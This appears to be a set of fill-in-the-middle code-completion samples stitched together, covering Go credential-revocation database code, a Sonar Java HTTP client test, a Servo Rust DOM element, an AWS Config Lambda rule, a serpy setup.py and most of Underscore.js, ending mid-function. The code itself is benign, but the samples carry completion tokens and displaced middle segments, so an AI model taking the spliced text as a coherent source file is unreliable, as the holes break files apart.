(e *EventRecord) Convert(id CredentialTypeIdentifier, pkcounter uint, event *revocation.Event) *EventRecord { *e = EventRecord{ Index: &event.Index, E: (*RevocationAttribute)(event.E), ParentHash: eventHash(event.ParentHash), CredType: id, PKCounter: &pkcounter, } return e } func (a *AccumulatorRecord) SignedAccumulator() *revocation.SignedAccumulator { return &revocation.SignedAccumulator{ PKCounter: *a.PKCounter, Data: signed.Message(a.Data), } } func (a *AccumulatorRecord) Convert(id CredentialTypeIdentifier, sacc *revocation.SignedAccumulator) *AccumulatorRecord { *a = AccumulatorRecord{ Data: signedMessage(sacc.Data), PKCounter: &sacc.PKCounter, CredType: id, } return a } func (signedMessage) GormDataType(dialect gorm.Dialect) string { switch dialect.GetName() { case "postgres": return "bytea" case "mysql": return "blob" default: return "" } } // Value implements driver.Valuer, for SQL marshaling (to []byte). func (i *RevocationAttribute) Value() (driver.Value, error) { return (*big.Int)(i).Bytes(), nil } // Scan implements sql.Scanner, for SQL unmarshaling (from a []byte). func (i *RevocationAttribute) Scan(src interface{}) error { b, ok := src.([]byte) if !ok { return errors.New("cannot convert source: not a byte slice") } (*big.Int)(i).SetBytes(b) return nil } func (RevocationAttribute) GormDataType(dialect gorm.Dialect) string { switch dialect.GetName() { case "postgres": return "bytea" case "mysql": return "blob" default: return "" } } func (i *RevocationAttribute) MarshalCBOR() ([]byte, error) { return cbor.Marshal((*big.Int)(i), cbor.EncOptions{}) } func (i *RevocationAttribute) UnmarshalCBOR(data []byte) error { return cbor.Unmarshal(data, (*big.Int)(i)) } func (rs RevocationSettings) Get(id CredentialTypeIdentifier) *RevocationSetting { if rs[id] == nil { rs[id] = &RevocationSetting{} } s := rs[id] if s.Tolerance == 0 { s.Tolerance = RevocationParameters.DefaultTolerance } return s } func (rs RevocationSettings) fixCase(conf *Configuration) { for id := range conf.CredentialTypes { idlc := NewCredentialTypeIdentifier(strings.ToLower(id.String())) if settings := rs[idlc]; settings != nil { delete(rs, idlc) rs[id] = settings } } } func (rs RevocationSettings) fixSlash() { for _, s := range rs { s.RevocationServerURL = strings.TrimRight(s.RevocationServerURL, "/") } } func (hash eventHash) Value() (driver.Value, error) { return []byte(hash), nil } func (hash *eventHash) Scan(src interface{}) error { s, ok := src.([]byte) if !ok { return errors.New("cannot convert source: not a []byte") } *hash = make([]byte, len(s)) copy(*hash, s) return nil } func (eventHash) GormDataType(dialect gorm.Dialect) string { switch dialect.GetName() { case "postgres": return "bytea" case "mysql": return "blob" default: return "" } } // binaryPartition splits the interval [from, to] into multiple adjacent intervals // whose union cover [from, to], and whose length is a power of two decreasing as they near 'to'. func binaryPartition(from, to uint64) [][2]uint64 { min, max := RevocationParameters.UpdateMinCount, RevocationParameters.UpdateMaxCount start := from / max * max // round down to nearest multiple of max end := (to + min) / min * min // round up to nearest multiple of min pow := bits.Len64(end) - 1 if pow > RevocationParameters.UpdateMaxCountPower { pow = RevocationParameters.UpdateMaxCountPower } var intervals [][2]uint64 for i := start; i < end; { for i+1<<pow > end { pow-- } intervals = append(intervals, [2]uint64{i, i + 1<<pow}) i += 1 << pow } return intervals }<|fim▁end|>
<|file_name|>ServerHttpClientTest.java<|end_file_name|><|fim▁begin|>/* * Sonar, open source software quality management tool. * Copyright (C) 2008-2011 SonarSource * mailto:contact AT sonarsource DOT com * * Sonar is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 3 of the License, or (at your option) any later version. * * Sonar is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with Sonar; if not, write to the Free Software * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02 */ package org.sonar.api.utils; import static org.hamcrest.MatcherAssert.assertThat; import static org.hamcrest.Matchers.is; import org.junit.Before; import org.junit.Test; import java.io.IOException; public class ServerHttpClientTest { private String serverUrl = "http://test"; private ServerHttpClient serverHttpClient; @Before public void before() { serverHttpClient = new ServerHttpClient(serverUrl); } @Test public void shouldReturnAValidResult() throws IOException { final String validContent = "valid"; ServerHttpClient serverHttpClient = new ServerHttpClient(serverUrl) { @Override protected String getRemoteContent(String url) { return (validContent); } }; assertThat(serverHttpClient.executeAction("an action"), is(validContent)); } @Test public void shouldRemoveLastUrlSlash() { ServerHttpClient serverHttpClient = new ServerHttpClient(serverUrl + "/"); assertThat(serverHttpClient.getUrl(), is(serverUrl)); } @Test(expected = ServerHttpClient.ServerApiEmptyContentException.class) public void shouldThrowAnExceptionIfResultIsEmpty() throws IOException { final String invalidContent = " "; ServerHttpClient serverHttpClient = new ServerHttpClient(serverUrl) { @Override protected String getRemoteContent(String url) { return (invalidContent); } }; serverHttpClient.executeAction("an action"); } @Test public void shouldReturnMavenRepositoryUrl() { String sonarRepo = serverHttpClient.getMavenRepositoryUrl(); assertThat(sonarRepo, is(serverUrl + ServerHttpClient.MAVEN_PATH)); } @Test(expected = ServerHttpClient.ServerConnectionException.class)<|fim▁hole|> protected String getRemoteContent(String url) { throw new ServerConnectionException(""); } }; serverHttpClient.checkUp(); } }<|fim▁end|>
public void shouldFailIfCanNotConnectToServer() { ServerHttpClient serverHttpClient = new ServerHttpClient("fake") { @Override
<|file_name|>htmllielement.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public * License, v. 2.0. If a copy of the MPL was not distributed with this * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ use dom::bindings::codegen::Bindings::HTMLLIElementBinding; use dom::bindings::js::Root; use dom::document::Document; use dom::htmlelement::HTMLElement; use dom::node::Node; use util::str::DOMString;<|fim▁hole|>#[dom_struct] pub struct HTMLLIElement { htmlelement: HTMLElement, } impl HTMLLIElement { fn new_inherited(localName: DOMString, prefix: Option<DOMString>, document: &Document) -> HTMLLIElement { HTMLLIElement { htmlelement: HTMLElement::new_inherited(localName, prefix, document) } } #[allow(unrooted_must_root)] pub fn new(localName: DOMString, prefix: Option<DOMString>, document: &Document) -> Root<HTMLLIElement> { let element = HTMLLIElement::new_inherited(localName, prefix, document); Node::reflect_node(box element, document, HTMLLIElementBinding::Wrap) } }<|fim▁end|>
<|file_name|>config_enabled_in_region-periodic.js<|end_file_name|><|fim▁begin|>// // This file made available under CC0 1.0 Universal (https://creativecommons.org/publicdomain/zero/1.0/legalcode) // var aws = require('aws-sdk'); var s3 = new aws.S3(); var zlib = require('zlib'); <|fim▁hole|>var iam = new aws.IAM(); // Helper function used to validate input function checkDefined(reference, referenceName) { if (!reference) { console.log("Error: " + referenceName + " is not defined"); throw referenceName; } return reference; } // Extract the account ID from the event function getAccountId(invokingEvent) { checkDefined(invokingEvent, "invokingEvent"); checkDefined(invokingEvent.s3ObjectKey, "invokingEvent.s3ObjectKey"); var accountIdPattern = /AWSLogs\/(\d+)\/Config/; return accountIdPattern.exec(invokingEvent.s3ObjectKey)[1]; } // This is the handler that's invoked by Lambda exports.handler = function(event, context) { checkDefined(event, "event"); var invokingEvent = JSON.parse(event.invokingEvent); var ruleParameters = JSON.parse(event.ruleParameters); var s3key = invokingEvent.s3ObjectKey; var s3bucket = invokingEvent.s3Bucket; var accountId = getAccountId(invokingEvent); var orderingTimestamp = invokingEvent.notificationCreationTime; config.describeConfigurationRecorders({}, function(err, data) { var compliance = 'NON_COMPLIANT'; if (!err) { for (var i = 0; i < data.ConfigurationRecorders.length; i++) { if (data.ConfigurationRecorders[i].recordingGroup.allSupported && data.ConfigurationRecorders[i].recordingGroup.includeGlobalResourceTypes) { compliance = 'COMPLIANT'; } } } evaluation = { ComplianceResourceType: 'AWS::::Account', ComplianceResourceId: accountId, ComplianceType: compliance, OrderingTimestamp: orderingTimestamp }; putEvaluationsRequest = { Evaluations: [ evaluation ], ResultToken: event.resultToken }; config.putEvaluations(putEvaluationsRequest, function (err, data) { if (err) { context.fail(err); } else { context.succeed(data); } }); }); };<|fim▁end|>
var config = new aws.ConfigService();
<|file_name|>setup.py<|end_file_name|><|fim▁begin|>from codecs import open from os import path from setuptools import setup, find_packages here = path.abspath(path.dirname(__file__)) with open(path.join(here, 'README.rst'), encoding='utf-8') as f: long_description = f.read() setup(<|fim▁hole|> name='serpy', version='0.3.1', description='ridiculously fast object serialization', long_description=long_description, url='https://github.com/clarkduvall/serpy', author='Clark DuVall', author_email='[email protected]', license='MIT', install_requires=['six'], test_suite='tests', classifiers=[ 'Development Status :: 4 - Beta', 'Intended Audience :: Developers', 'License :: OSI Approved :: MIT License', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.4', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: Implementation :: CPython', 'Programming Language :: Python :: Implementation :: PyPy', ], keywords=('serialization', 'rest', 'json', 'api', 'marshal', 'marshalling', 'validation', 'schema', 'fast'), packages=find_packages(exclude=[ 'contrib', 'docs', 'tests*', 'benchmarks' ]), )<|fim▁end|>
<|file_name|>underscore.js<|end_file_name|><|fim▁begin|>// Underscore.js 1.4.3 // http://underscorejs.org // (c) 2009-2012 Jeremy Ashkenas, DocumentCloud Inc. // Underscore may be freely distributed under the MIT license. (function() { // Baseline setup // -------------- // Establish the root object, `window` in the browser, or `global` on the server. var root = this; // Save the previous value of the `_` variable. var previousUnderscore = root._; // Establish the object that gets returned to break out of a loop iteration. var breaker = {}; // Save bytes in the minified (but not gzipped) version: var ArrayProto = Array.prototype, ObjProto = Object.prototype, FuncProto = Function.prototype; // Create quick reference variables for speed access to core prototypes. var push = ArrayProto.push, slice = ArrayProto.slice, concat = ArrayProto.concat, toString = ObjProto.toString, hasOwnProperty = ObjProto.hasOwnProperty; // All **ECMAScript 5** native function implementations that we hope to use // are declared here. var nativeForEach = ArrayProto.forEach, nativeMap = ArrayProto.map, nativeReduce = ArrayProto.reduce, nativeReduceRight = ArrayProto.reduceRight, nativeFilter = ArrayProto.filter, nativeEvery = ArrayProto.every, nativeSome = ArrayProto.some, nativeIndexOf = ArrayProto.indexOf, nativeLastIndexOf = ArrayProto.lastIndexOf, nativeIsArray = Array.isArray, nativeKeys = Object.keys, nativeBind = FuncProto.bind; // Create a safe reference to the Underscore object for use below. var _ = function(obj) { if (obj instanceof _) return obj; if (!(this instanceof _)) return new _(obj); this._wrapped = obj; }; // Export the Underscore object for **Node.js**, with // backwards-compatibility for the old `require()` API. If we're in // the browser, add `_` as a global object via a string identifier, // for Closure Compiler "advanced" mode. if (typeof exports !== 'undefined') { if (typeof module !== 'undefined' && module.exports) { exports = module.exports = _; } exports._ = _; } else { root._ = _; } // Current version. _.VERSION = '1.4.3'; // Collection Functions // -------------------- // The cornerstone, an `each` implementation, aka `forEach`. // Handles objects with the built-in `forEach`, arrays, and raw objects. // Delegates to **ECMAScript 5**'s native `forEach` if available. var each = _.each = _.forEach = function(obj, iterator, context) { if (obj == null) return; if (nativeForEach && obj.forEach === nativeForEach) { obj.forEach(iterator, context); } else if (obj.length === +obj.length) { for (var i = 0, l = obj.length; i < l; i++) { if (iterator.call(context, obj[i], i, obj) === breaker) return; } } else { for (var key in obj) { if (_.has(obj, key)) { if (iterator.call(context, obj[key], key, obj) === breaker) return; } } } }; // Return the results of applying the iterator to each element. // Delegates to **ECMAScript 5**'s native `map` if available. _.map = _.collect = function(obj, iterator, context) { var results = []; if (obj == null) return results; if (nativeMap && obj.map === nativeMap) return obj.map(iterator, context); each(obj, function(value, index, list) { results[results.length] = iterator.call(context, value, index, list); }); return results; }; var reduceError = 'Reduce of empty array with no initial value'; // **Reduce** builds up a single result from a list of values, aka `inject`, // or `foldl`. Delegates to **ECMAScript 5**'s native `reduce` if available. _.reduce = _.foldl = _.inject = function(obj, iterator, memo, context) { var initial = arguments.length > 2; if (obj == null) obj = []; if (nativeReduce && obj.reduce === nativeReduce) { if (context) iterator = _.bind(iterator, context); return initial ? obj.reduce(iterator, memo) : obj.reduce(iterator); } each(obj, function(value, index, list) { if (!initial) { memo = value; initial = true; } else { memo = iterator.call(context, memo, value, index, list); } }); if (!initial) throw new TypeError(reduceError); return memo; }; // The right-associative version of reduce, also known as `foldr`. // Delegates to **ECMAScript 5**'s native `reduceRight` if available. _.reduceRight = _.foldr = function(obj, iterator, memo, context) { var initial = arguments.length > 2; if (obj == null) obj = []; if (nativeReduceRight && obj.reduceRight === nativeReduceRight) { if (context) iterator = _.bind(iterator, context); return initial ? obj.reduceRight(iterator, memo) : obj.reduceRight(iterator); } var length = obj.length; if (length !== +length) { var keys = _.keys(obj); length = keys.length; } each(obj, function(value, index, list) { index = keys ? keys[--length] : --length; if (!initial) { memo = obj[index]; initial = true; } else { memo = iterator.call(context, memo, obj[index], index, list); } }); if (!initial) throw new TypeError(reduceError); return memo; }; // Return the first value which passes a truth test. Aliased as `detect`. _.find = _.detect = function(obj, iterator, context) { var result; any(obj, function(value, index, list) { if (iterator.call(context, value, index, list)) { result = value; return true; } }); return result; }; // Return all the elements that pass a truth test. // Delegates to **ECMAScript 5**'s native `filter` if available. // Aliased as `select`. _.filter = _.select = function(obj, iterator, context) { var results = []; if (obj == null) return results; if (nativeFilter && obj.filter === nativeFilter) return obj.filter(iterator, context); each(obj, function(value, index, list) { if (iterator.call(context, value, index, list)) results[results.length] = value; }); return results; }; // Return all the elements for which a truth test fails. _.reject = function(obj, iterator, context) { return _.filter(obj, function(value, index, list) { return !iterator.call(context, value, index, list); }, context); }; // Determine whether all of the elements match a truth test. // Delegates to **ECMAScript 5**'s native `every` if available. // Aliased as `all`. _.every = _.all = function(obj, iterator, context) { iterator || (iterator = _.identity); var result = true; if (obj == null) return result; if (nativeEvery && obj.every === nativeEvery) return obj.every(iterator, context); each(obj, function(value, index, list) { if (!(result = result && iterator.call(context, value, index, list))) return breaker; }); return !!result; }; // Determine if at least one element in the object matches a truth test. // Delegates to **ECMAScript 5**'s native `some` if available. // Aliased as `any`. var any = _.some = _.any = function(obj, iterator, context) { iterator || (iterator = _.identity); var result = false; if (obj == null) return result; if (nativeSome && obj.some === nativeSome) return obj.some(iterator, context); each(obj, function(value, index, list) { if (result || (result = iterator.call(context, value, index, list))) return breaker; }); return !!result; }; // Determine if the array or object contains a given value (using `===`). // Aliased as `include`. _.contains = _.include = function(obj, target) { if (obj == null) return false; if (nativeIndexOf && obj.indexOf === nativeIndexOf) return obj.indexOf(target) != -1; return any(obj, function(value) { return value === target; }); }; // Invoke a method (with arguments) on every item in a collection. _.invoke = function(obj, method) { var args = slice.call(arguments, 2); return _.map(obj, function(value) { return (_.isFunction(method) ? method : value[method]).apply(value, args); }); }; // Convenience version of a common use case of `map`: fetching a property. _.pluck = function(obj, key) { return _.map(obj, function(value){ return value[key]; }); }; // Convenience version of a common use case of `filter`: selecting only objects // with specific `key:value` pairs. _.where = function(obj, attrs) { if (_.isEmpty(attrs)) return []; return _.filter(obj, function(value) { for (var key in attrs) { if (attrs[key] !== value[key]) return false; } return true; }); }; // Return the maximum element or (element-based computation). // Can't optimize arrays of integers longer than 65,535 elements. // See: https://bugs.webkit.org/show_bug.cgi?id=80797 _.max = function(obj, iterator, context) { if (!iterator && _.isArray(obj) && obj[0] === +obj[0] && obj.length < 65535) { return Math.max.apply(Math, obj); } if (!iterator && _.isEmpty(obj)) return -Infinity; var result = {computed : -Infinity, value: -Infinity}; each(obj, function(value, index, list) { var computed = iterator ? iterator.call(context, value, index, list) : value; computed >= result.computed && (result = {value : value, computed : computed}); }); return result.value; }; // Return the minimum element (or element-based computation). _.min = function(obj, iterator, context) { if (!iterator && _.isArray(obj) && obj[0] === +obj[0] && obj.length < 65535) { return Math.min.apply(Math, obj); } if (!iterator && _.isEmpty(obj)) return Infinity; var result = {computed : Infinity, value: Infinity}; each(obj, function(value, index, list) { var computed = iterator ? iterator.call(context, value, index, list) : value; computed < result.computed && (result = {value : value, computed : computed}); }); return result.value; }; // Shuffle an array. _.shuffle = function(obj) { var rand; var index = 0; var shuffled = []; each(obj, function(value) { rand = _.random(index++); shuffled[index - 1] = shuffled[rand]; shuffled[rand] = value; }); return shuffled; }; // An internal function to generate lookup iterators. var lookupIterator = function(value) { return _.isFunction(value) ? value : function(obj){ return obj[value]; }; }; // Sort the object's values by a criterion produced by an iterator. _.sortBy = function(obj, value, context) { var iterator = lookupIterator(value); return _.pluck(_.map(obj, function(value, index, list) { return { value : value, index : index, criteria : iterator.call(context, value, index, list) }; }).sort(function(left, right) { var a = left.criteria; var b = right.criteria; if (a !== b) { if (a > b || a === void 0) return 1; if (a < b || b === void 0) return -1; } return left.index < right.index ? -1 : 1; }), 'value'); }; // An internal function used for aggregate "group by" operations. var group = function(obj, value, context, behavior) { var result = {}; var iterator = lookupIterator(value || _.identity); each(obj, function(value, index) { var key = iterator.call(context, value, index, obj); behavior(result, key, value); }); return result; }; // Groups the object's values by a criterion. Pass either a string attribute // to group by, or a function that returns the criterion. _.groupBy = function(obj, value, context) { return group(obj, value, context, function(result, key, value) { (_.has(result, key) ? result[key] : (result[key] = [])).push(value); }); }; // Counts instances of an object that group by a certain criterion. Pass // either a string attribute to count by, or a function that returns the // criterion. _.countBy = function(obj, value, context) { return group(obj, value, context, function(result, key) { if (!_.has(result, key)) result[key] = 0; result[key]++; }); }; // Use a comparator function to figure out the smallest index at which // an object should be inserted so as to maintain order. Uses binary search. _.sortedIndex = function(array, obj, iterator, context) { iterator = iterator == null ? _.identity : lookupIterator(iterator); var value = iterator.call(context, obj); var low = 0, high = array.length; while (low < high) { var mid = (low + high) >>> 1; iterator.call(context, array[mid]) < value ? low = mid + 1 : high = mid; } return low; }; // Safely convert anything iterable into a real, live array. _.toArray = function(obj) { if (!obj) return []; if (_.isArray(obj)) return slice.call(obj); if (obj.length === +obj.length) return _.map(obj, _.identity); return _.values(obj); }; // Return the number of elements in an object. _.size = function(obj) { if (obj == null) return 0; return (obj.length === +obj.length) ? obj.length : _.keys(obj).length; }; // Array Functions // --------------- // Get the first element of an array. Passing **n** will return the first N // values in the array. Aliased as `head` and `take`. The **guard** check // allows it to work with `_.map`. _.first = _.head = _.take = function(array, n, guard) { if (array == null) return void 0; return (n != null) && !guard ? slice.call(array, 0, n) : array[0]; }; // Returns everything but the last entry of the array. Especially useful on // the arguments object. Passing **n** will return all the values in // the array, excluding the last N. The **guard** check allows it to work with // `_.map`. _.initial = function(array, n, guard) { return slice.call(array, 0, array.length - ((n == null) || guard ? 1 : n)); }; // Get the last element of an array. Passing **n** will return the last N // values in the array. The **guard** check allows it to work with `_.map`. _.last = function(array, n, guard) { if (array == null) return void 0; if ((n != null) && !guard) { return slice.call(array, Math.max(array.length - n, 0)); } else { return array[array.length - 1]; } }; // Returns everything but the first entry of the array. Aliased as `tail` and `drop`. // Especially useful on the arguments object. Passing an **n** will return // the rest N values in the array. The **guard** // check allows it to work with `_.map`. _.rest = _.tail = _.drop = function(array, n, guard) { return slice.call(array, (n == null) || guard ? 1 : n); }; // Trim out all falsy values from an array. _.compact = function(array) { return _.filter(array, _.identity); }; // Internal implementation of a recursive `flatten` function. var flatten = function(input, shallow, output) { each(input, function(value) { if (_.isArray(value)) { shallow ? push.apply(output, value) : flatten(value, shallow, output); } else { output.push(value); } }); return output; }; // Return a completely flattened version of an array. _.flatten = function(array, shallow) { return flatten(array, shallow, []); }; // Return a version of the array that does not contain the specified value(s). _.without = function(array) { return _.difference(array, slice.call(arguments, 1)); }; // Produce a duplicate-free version of the array. If the array has already // been sorted, you have the option of using a faster algorithm. // Aliased as `unique`. _.uniq = _.unique = function(array, isSorted, iterator, context) { if (_.isFunction(isSorted)) { context = iterator; iterator = isSorted; isSorted = false; } var initial = iterator ? _.map(array, iterator, context) : array; var results = []; var seen = []; each(initial, function(value, index) { if (isSorted ? (!index || seen[seen.length - 1] !== value) : !_.contains(seen, value)) { seen.push(value); results.push(array[index]); } }); return results; }; // Produce an array that contains the union: each distinct element from all of // the passed-in arrays. _.union = function() { return _.uniq(concat.apply(ArrayProto, arguments)); }; // Produce an array that contains every item shared between all the // passed-in arrays. _.intersection = function(array) { var rest = slice.call(arguments, 1); return _.filter(_.uniq(array), function(item) { return _.every(rest, function(other) { return _.indexOf(other, item) >= 0; }); }); }; // Take the difference between one array and a number of other arrays. // Only the elements present in just the first array will remain. _.difference = function(array) { var rest = concat.apply(ArrayProto, slice.call(arguments, 1)); return _.filter(array, function(value){ return !_.contains(rest, value); }); }; // Zip together multiple lists into a single array -- elements that share // an index go together. _.zip = function() { var args = slice.call(arguments); var length = _.max(_.pluck(args, 'length')); var results = new Array(length); for (var i = 0; i < length; i++) { results[i] = _.pluck(args, "" + i); } return results; }; // Converts lists into objects. Pass either a single array of `[key, value]` // pairs, or two parallel arrays of the same length -- one of keys, and one of // the corresponding values. _.object = function(list, values) { if (list == null) return {}; var result = {}; for (var i = 0, l = list.length; i < l; i++) { if (values) { result[list[i]] = values[i]; } else { result[list[i][0]] = list[i][1]; } } return result; }; // If the browser doesn't supply us with indexOf (I'm looking at you, **MSIE**), // we need this function. Return the position of the first occurrence of an // item in an array, or -1 if the item is not included in the array. // Delegates to **ECMAScript 5**'s native `indexOf` if available. // If the array is large and already in sort order, pass `true` // for **isSorted** to use binary search. _.indexOf = function(array, item, isSorted) { if (array == null) return -1; var i = 0, l = array.length; if (isSorted) { if (typeof isSorted == 'number') { i = (isSorted < 0 ? Math.max(0, l + isSorted) : isSorted); } else { i = _.sortedIndex(array, item); return array[i] === item ? i : -1; } } if (nativeIndexOf && array.indexOf === nativeIndexOf) return array.indexOf(item, isSorted); for (; i < l; i++) if (array[i] === item) return i; return -1; }; // Delegates to **ECMAScript 5**'s native `lastIndexOf` if available. _.lastIndexOf = function(array, item, from) { if (array == null) return -1; var hasIndex = from != null; if (nativeLastIndexOf && array.lastIndexOf === nativeLastIndexOf) { return hasIndex ? array.lastIndexOf(item, from) : array.lastIndexOf(item); } var i = (hasIndex ? from : array.length); while (i--) if (array[i] === item) return i;<|fim▁hole|> // Generate an integer Array containing an arithmetic progression. A port of // the native Python `range()` function. See // [the Python documentation](http://docs.python.org/library/functions.html#range). _.range = function(start, stop, step) { if (arguments.length <= 1) { stop = start || 0; start = 0; } step = arguments[2] || 1; var len = Math.max(Math.ceil((stop - start) / step), 0); var idx = 0; var range = new Array(len); while(idx < len) { range[idx++] = start; start += step; } return range; }; // Function (ahem) Functions // ------------------ // Reusable constructor function for prototype setting. var ctor = function(){}; // Create a function bound to a given object (assigning `this`, and arguments, // optionally). Binding with arguments is also known as `curry`. // Delegates to **ECMAScript 5**'s native `Function.bind` if available. // We check for `func.bind` first, to fail fast when `func` is undefined. _.bind = function(func, context) { var args, bound; if (func.bind === nativeBind && nativeBind) return nativeBind.apply(func, slice.call(arguments, 1)); if (!_.isFunction(func)) throw new TypeError; args = slice.call(arguments, 2); return bound = function() { if (!(this instanceof bound)) return func.apply(context, args.concat(slice.call(arguments))); ctor.prototype = func.prototype; var self = new ctor; ctor.prototype = null; var result = func.apply(self, args.concat(slice.call(arguments))); if (Object(result) === result) return result; return self; }; }; // Bind all of an object's methods to that object. Useful for ensuring that // all callbacks defined on an object belong to it. _.bindAll = function(obj) { var funcs = slice.call(arguments, 1); if (funcs.length == 0) funcs = _.functions(obj); each(funcs, function(f) { obj[f] = _.bind(obj[f], obj); }); return obj; }; // Memoize an expensive function by storing its results. _.memoize = function(func, hasher) { var memo = {}; hasher || (hasher = _.identity); return function() { var key = hasher.apply(this, arguments); return _.has(memo, key) ? memo[key] : (memo[key] = func.apply(this, arguments)); }; }; // Delays a function for the given number of milliseconds, and then calls // it with the arguments supplied. _.delay = function(func, wait) { var args = slice.call(arguments, 2); return setTimeout(function(){ return func.apply(null, args); }, wait); }; // Defers a function, scheduling it to run after the current call stack has // cleared. _.defer = function(func) { return _.delay.apply(_, [func, 1].concat(slice.call(arguments, 1))); }; // Returns a function, that, when invoked, will only be triggered at most once // during a given window of time. _.throttle = function(func, wait) { var context, args, timeout, result; var previous = 0; var later = function() { previous = new Date; timeout = null; result = func.apply(context, args); }; return function() { var now = new Date; var remaining = wait - (now - previous); context = this; args = arguments; if (remaining <= 0) { clearTimeout(timeout); timeout = null; previous = now; result = func.apply(context, args); } else if (!timeout) { timeout = setTimeout(later, remaining); } return result; }; }; // Returns a function, that, as long as it continues to be invoked, will not // be triggered. The function will be called after it stops being called for // N milliseconds. If `immediate` is passed, trigger the function on the // leading edge, instead of the trailing. _.debounce = function(func, wait, immediate) { var timeout, result; return function() { var context = this, args = arguments; var later = function() { timeout = null; if (!immediate) result = func.apply(context, args); }; var callNow = immediate && !timeout; clearTimeout(timeout); timeout = setTimeout(later, wait); if (callNow) result = func.apply(context, args); return result; }; }; // Returns a function that will be executed at most one time, no matter how // often you call it. Useful for lazy initialization. _.once = function(func) { var ran = false, memo; return function() { if (ran) return memo; ran = true; memo = func.apply(this, arguments); func = null; return memo; }; }; // Returns the first function passed as an argument to the second, // allowing you to adjust arguments, run code before and after, and // conditionally execute the original function. _.wrap = function(func, wrapper) { return function() { var args = [func]; push.apply(args, arguments); return wrapper.apply(this, args); }; }; // Returns a function that is the composition of a list of functions, each // consuming the return value of the function that follows. _.compose = function() { var funcs = arguments; return function() { var args = arguments; for (var i = funcs.length - 1; i >= 0; i--) { args = [funcs[i].apply(this, args)]; } return args[0]; }; }; // Returns a function that will only be executed after being called N times. _.after = function(times, func) { if (times <= 0) return func(); return function() { if (--times < 1) { return func.apply(this, arguments); } }; }; // Object Functions // ---------------- // Retrieve the names of an object's properties. // Delegates to **ECMAScript 5**'s native `Object.keys` _.keys = nativeKeys || function(obj) { if (obj !== Object(obj)) throw new TypeError('Invalid object'); var keys = []; for (var key in obj) if (_.has(obj, key)) keys[keys.length] = key; return keys; }; // Retrieve the values of an object's properties. _.values = function(obj) { var values = []; for (var key in obj) if (_.has(obj, key)) values.push(obj[key]); return values; }; // Convert an object into a list of `[key, value]` pairs. _.pairs = function(obj) { var pairs = []; for (var key in obj) if (_.has(obj, key)) pairs.push([key, obj[key]]); return pairs; }; // Invert the keys and values of an object. The values must be serializable. _.invert = function(obj) { var result = {}; for (var key in obj) if (_.has(obj, key)) result[obj[key]] = key; return result; }; // Return a sorted list of the function names available on the object. // Aliased as `methods` _.functions = _.methods = function(obj) { var names = []; for (var key in obj) { if (_.isFunction(obj[key])) names.push(key); } return names.sort(); }; // Extend a given object with all the properties in passed-in object(s). _.extend = function(obj) { each(slice.call(arguments, 1), function(source) { if (source) { for (var prop in source) { obj[prop] = source[prop]; } } }); return obj; }; // Return a copy of the object only containing the whitelisted properties. _.pick = function(obj) { var copy = {}; var keys = concat.apply(ArrayProto, slice.call(arguments, 1)); each(keys, function(key) { if (key in obj) copy[key] = obj[key]; }); return copy; }; // Return a copy of the object without the blacklisted properties. _.omit = function(obj) { var copy = {}; var keys = concat.apply(ArrayProto, slice.call(arguments, 1)); for (var key in obj) { if (!_.contains(keys, key)) copy[key] = obj[key]; } return copy; }; // Fill in a given object with default properties. _.defaults = function(obj) { each(slice.call(arguments, 1), function(source) { if (source) { for (var prop in source) { if (obj[prop] == null) obj[prop] = source[prop]; } } }); return obj; }; // Create a (shallow-cloned) duplicate of an object. _.clone = function(obj) { if (!_.isObject(obj)) return obj; return _.isArray(obj) ? obj.slice() : _.extend({}, obj); }; // Invokes interceptor with the obj, and then returns obj. // The primary purpose of this method is to "tap into" a method chain, in // order to perform operations on intermediate results within the chain. _.tap = function(obj, interceptor) { interceptor(obj); return obj; }; // Internal recursive comparison function for `isEqual`. var eq = function(a, b, aStack, bStack) { // Identical objects are equal. `0 === -0`, but they aren't identical. // See the Harmony `egal` proposal: http://wiki.ecmascript.org/doku.php?id=harmony:egal. if (a === b) return a !== 0 || 1 / a == 1 / b; // A strict comparison is necessary because `null == undefined`. if (a == null || b == null) return a === b; // Unwrap any wrapped objects. if (a instanceof _) a = a._wrapped; if (b instanceof _) b = b._wrapped; // Compare `[[Class]]` names. var className = toString.call(a); if (className != toString.call(b)) return false; switch (className) { // Strings, numbers, dates, and booleans are compared by value. case '[object String]': // Primitives and their corresponding object wrappers are equivalent; thus, `"5"` is // equivalent to `new String("5")`. return a == String(b); case '[object Number]': // `NaN`s are equivalent, but non-reflexive. An `egal` comparison is performed for // other numeric values. return a != +a ? b != +b : (a == 0 ? 1 / a == 1 / b : a == +b); case '[object Date]': case '[object Boolean]': // Coerce dates and booleans to numeric primitive values. Dates are compared by their // millisecond representations. Note that invalid dates with millisecond representations // of `NaN` are not equivalent. return +a == +b; // RegExps are compared by their source patterns and flags. case '[object RegExp]': return a.source == b.source && a.global == b.global && a.multiline == b.multiline && a.ignoreCase == b.ignoreCase; } if (typeof a != 'object' || typeof b != 'object') return false; // Assume equality for cyclic structures. The algorithm for detecting cyclic // structures is adapted from ES 5.1 section 15.12.3, abstract operation `JO`. var length = aStack.length; while (length--) { // Linear search. Performance is inversely proportional to the number of // unique nested structures. if (aStack[length] == a) return bStack[length] == b; } // Add the first object to the stack of traversed objects. aStack.push(a); bStack.push(b); var size = 0, result = true; // Recursively compare objects and arrays. if (className == '[object Array]') { // Compare array lengths to determine if a deep comparison is necessary. size = a.length; result = size == b.length; if (result) { // Deep compare the contents, ignoring non-numeric properties. while (size--) { if (!(result = eq(a[size], b[size], aStack, bStack))) break; } } } else { // Objects with different constructors are not equivalent, but `Object`s // from different frames are. var aCtor = a.constructor, bCtor = b.constructor; if (aCtor !== bCtor && !(_.isFunction(aCtor) && (aCtor instanceof aCtor) && _.isFunction(bCtor) && (bCtor instanceof bCtor))) { return false; } // Deep compare objects. for (var key in a) { if (_.has(a, key)) { // Count the expected number of properties. 